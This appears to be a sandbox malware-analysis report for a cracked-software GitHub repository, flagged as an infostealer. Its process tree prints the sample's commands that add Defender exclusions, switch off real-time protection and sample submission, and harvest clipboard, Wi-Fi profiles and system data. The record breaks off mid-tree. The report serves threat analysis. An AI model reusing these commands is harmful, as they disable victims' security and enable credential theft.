hxxps://github[.]com/axslin/Celex-Crack

Analysis

max time kernel
63s
max time network
69s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
02/06/2024, 16:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/axslin/Celex-Crack

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3508	powershell.exe
5368	powershell.exe
5536	powershell.exe
5728	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 3 IoCs

pid	Process
5720	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5584	bound.exe

Loads dropped DLL 21 IoCs

pid	Process
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5900	Adobe_Premiere_Pro.exe
5584	bound.exe
5584	bound.exe
5584	bound.exe
5584	bound.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 38 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000002350a-341.dat	upx
behavioral1/memory/5900-345-0x00007FFCB71A0000-0x00007FFCB7789000-memory.dmp	upx
behavioral1/files/0x000700000002350e-348.dat	upx
behavioral1/files/0x00070000000234fe-349.dat	upx
behavioral1/memory/5900-350-0x00007FFCC9880000-0x00007FFCC9890000-memory.dmp	upx
behavioral1/files/0x0007000000023508-352.dat	upx
behavioral1/memory/5900-355-0x00007FFCC9370000-0x00007FFCC937F000-memory.dmp	upx
behavioral1/memory/5900-354-0x00007FFCB9A20000-0x00007FFCB9A43000-memory.dmp	upx
behavioral1/files/0x0007000000023501-356.dat	upx
behavioral1/memory/5900-358-0x00007FFCB9320000-0x00007FFCB934D000-memory.dmp	upx
behavioral1/files/0x00070000000234fd-359.dat	upx
behavioral1/memory/5900-361-0x00007FFCB9300000-0x00007FFCB9319000-memory.dmp	upx
behavioral1/files/0x0007000000023504-362.dat	upx
behavioral1/files/0x000700000002350d-364.dat	upx
behavioral1/memory/5900-368-0x00007FFCB9150000-0x00007FFCB92C7000-memory.dmp	upx
behavioral1/memory/5900-366-0x00007FFCB92D0000-0x00007FFCB92F3000-memory.dmp	upx
behavioral1/files/0x0007000000023503-369.dat	upx
behavioral1/files/0x000700000002350c-373.dat	upx
behavioral1/memory/5900-375-0x00007FFCC7270000-0x00007FFCC727D000-memory.dmp	upx
behavioral1/memory/5900-374-0x00007FFCB9130000-0x00007FFCB9149000-memory.dmp	upx
behavioral1/files/0x0007000000023505-377.dat	upx
behavioral1/files/0x0007000000023507-379.dat	upx
behavioral1/files/0x0007000000023509-380.dat	upx
behavioral1/memory/5900-386-0x00007FFCB6E20000-0x00007FFCB7198000-memory.dmp	upx
behavioral1/memory/5900-385-0x00007FFCB9040000-0x00007FFCB90F8000-memory.dmp	upx
behavioral1/memory/5900-384-0x00007FFCB9100000-0x00007FFCB912E000-memory.dmp	upx
behavioral1/memory/5900-383-0x00007FFCB71A0000-0x00007FFCB7789000-memory.dmp	upx
behavioral1/files/0x0007000000023500-387.dat	upx
behavioral1/files/0x0007000000023502-391.dat	upx
behavioral1/memory/5900-390-0x00007FFCB9020000-0x00007FFCB9034000-memory.dmp	upx
behavioral1/memory/5900-393-0x00007FFCC3990000-0x00007FFCC399D000-memory.dmp	upx
behavioral1/memory/5900-389-0x00007FFCB9A20000-0x00007FFCB9A43000-memory.dmp	upx
behavioral1/files/0x0007000000023506-394.dat	upx
behavioral1/files/0x000700000002350f-399.dat	upx
behavioral1/memory/5900-401-0x00007FFCB67D0000-0x00007FFCB68EC000-memory.dmp	upx
behavioral1/memory/5584-407-0x00007FF65A6B0000-0x00007FF65A8DC000-memory.dmp	upx
behavioral1/memory/5900-584-0x00007FFCB9300000-0x00007FFCB9319000-memory.dmp	upx
behavioral1/memory/5900-620-0x00007FFCB92D0000-0x00007FFCB92F3000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
67	raw.githubusercontent.com
68	raw.githubusercontent.com

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
5544	tasklist.exe
5556	tasklist.exe
5964	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
6124	systeminfo.exe

Kills process with taskkill 9 IoCs

evasion

pid	Process
5360	taskkill.exe
5256	taskkill.exe
4336	taskkill.exe
5364	taskkill.exe
2460	taskkill.exe
1328	taskkill.exe
5516	taskkill.exe
4596	taskkill.exe
5600	taskkill.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1224	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 728344.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

pid	Process
4084	msedge.exe
4084	msedge.exe
4796	msedge.exe
4796	msedge.exe
2688	identity_helper.exe
2688	identity_helper.exe
5612	msedge.exe
5612	msedge.exe
2820	powershell.exe
2820	powershell.exe
5536	powershell.exe
5536	powershell.exe
5728	powershell.exe
5728	powershell.exe
5368	powershell.exe
5368	powershell.exe
4400	powershell.exe
4400	powershell.exe
3508	powershell.exe
3508	powershell.exe
5728	powershell.exe
5536	powershell.exe
4400	powershell.exe
2820	powershell.exe
3508	powershell.exe
5368	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	5544	tasklist.exe
Token: SeDebugPrivilege	5556	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4872	WMIC.exe
Token: SeSecurityPrivilege	4872	WMIC.exe
Token: SeTakeOwnershipPrivilege	4872	WMIC.exe
Token: SeLoadDriverPrivilege	4872	WMIC.exe
Token: SeSystemProfilePrivilege	4872	WMIC.exe
Token: SeSystemtimePrivilege	4872	WMIC.exe
Token: SeProfSingleProcessPrivilege	4872	WMIC.exe
Token: SeIncBasePriorityPrivilege	4872	WMIC.exe
Token: SeCreatePagefilePrivilege	4872	WMIC.exe
Token: SeBackupPrivilege	4872	WMIC.exe
Token: SeRestorePrivilege	4872	WMIC.exe
Token: SeShutdownPrivilege	4872	WMIC.exe
Token: SeDebugPrivilege	4872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4872	WMIC.exe
Token: SeRemoteShutdownPrivilege	4872	WMIC.exe
Token: SeUndockPrivilege	4872	WMIC.exe
Token: SeManageVolumePrivilege	4872	WMIC.exe
Token: 33	4872	WMIC.exe
Token: 34	4872	WMIC.exe
Token: 35	4872	WMIC.exe
Token: 36	4872	WMIC.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	5536	powershell.exe
Token: SeDebugPrivilege	5728	powershell.exe
Token: SeIncreaseQuotaPrivilege	4872	WMIC.exe
Token: SeSecurityPrivilege	4872	WMIC.exe
Token: SeTakeOwnershipPrivilege	4872	WMIC.exe
Token: SeLoadDriverPrivilege	4872	WMIC.exe
Token: SeSystemProfilePrivilege	4872	WMIC.exe
Token: SeSystemtimePrivilege	4872	WMIC.exe
Token: SeProfSingleProcessPrivilege	4872	WMIC.exe
Token: SeIncBasePriorityPrivilege	4872	WMIC.exe
Token: SeCreatePagefilePrivilege	4872	WMIC.exe
Token: SeBackupPrivilege	4872	WMIC.exe
Token: SeRestorePrivilege	4872	WMIC.exe
Token: SeShutdownPrivilege	4872	WMIC.exe
Token: SeDebugPrivilege	4872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4872	WMIC.exe
Token: SeRemoteShutdownPrivilege	4872	WMIC.exe
Token: SeUndockPrivilege	4872	WMIC.exe
Token: SeManageVolumePrivilege	4872	WMIC.exe
Token: 33	4872	WMIC.exe
Token: 34	4872	WMIC.exe
Token: 35	4872	WMIC.exe
Token: 36	4872	WMIC.exe
Token: SeDebugPrivilege	5964	tasklist.exe
Token: SeDebugPrivilege	5368	powershell.exe
Token: SeDebugPrivilege	4400	powershell.exe
Token: SeDebugPrivilege	3508	powershell.exe

Suspicious use of FindShellTrayWindow 54 IoCs

pid	Process
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe
4796	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4796 wrote to memory of 1908	4796	msedge.exe	85
PID 4796 wrote to memory of 1908	4796	msedge.exe	85
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 2080	4796	msedge.exe	86
PID 4796 wrote to memory of 4084	4796	msedge.exe	87
PID 4796 wrote to memory of 4084	4796	msedge.exe	87
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88
PID 4796 wrote to memory of 984	4796	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/axslin/Celex-Crack
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcca3d46f8,0x7ffcca3d4708,0x7ffcca3d4718
  2⤵
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
  2⤵
  PID:2080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
  2⤵
  PID:984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:4004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:3412
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  PID:1692
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5184 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:1
  2⤵
  PID:2656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:4680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5552 /prefetch:1
  2⤵
  PID:3884
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5636 /prefetch:8
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:2584
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6088 /prefetch:8
  2⤵
  PID:5072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1960,15849553639525366781,5785588341122183913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5612
- C:\Users\Admin\Downloads\Adobe_Premiere_Pro.exe
  "C:\Users\Admin\Downloads\Adobe_Premiere_Pro.exe"
  2⤵
  - Executes dropped EXE
  PID:5720
- - C:\Users\Admin\Downloads\Adobe_Premiere_Pro.exe
    "C:\Users\Admin\Downloads\Adobe_Premiere_Pro.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Adobe_Premiere_Pro.exe'"
      4⤵
      PID:5252
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Adobe_Premiere_Pro.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
      4⤵
      PID:5268
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2820
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      PID:5288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      PID:5300
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏.scr'"
      4⤵
      PID:5224
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏.scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5728
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5184
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2968
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
      4⤵
      PID:116
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
        5⤵
        Modifies registry key
        
        PID:1224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:5528
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      PID:3148
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4400
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:3772
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5636
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:452
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      PID:5616
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        
        PID:4776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:1780
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:6124
  - - C:\Windows\system32\cmd.exe
